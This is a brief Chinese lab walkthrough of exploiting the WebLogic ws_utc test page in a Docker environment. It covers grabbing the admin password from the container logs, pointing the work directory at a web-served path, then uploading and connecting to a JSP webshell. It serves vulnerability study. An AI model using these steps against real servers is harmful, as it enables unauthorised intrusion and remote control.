拉取环境
访问页面:
http://192.168.127.131:7001/console/login/LoginForm.jsp
攻击机访问主站
获取账号密码
docker-compose logs | grep password
登录后台页面
点击`base_domain`的配置,在“高级”中开启“启用 Web 服
务测试页”选项:
访问漏洞主站
http://192.168.127.131:7001/ws_utc/config.do
修改工作目录
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
新建并上传jsp文件
找到时间戳
访问上传的webshell
http://192.168.127.131:7001/ws_utc/css/config/keystore/1688371221708_1.jsp
进行连接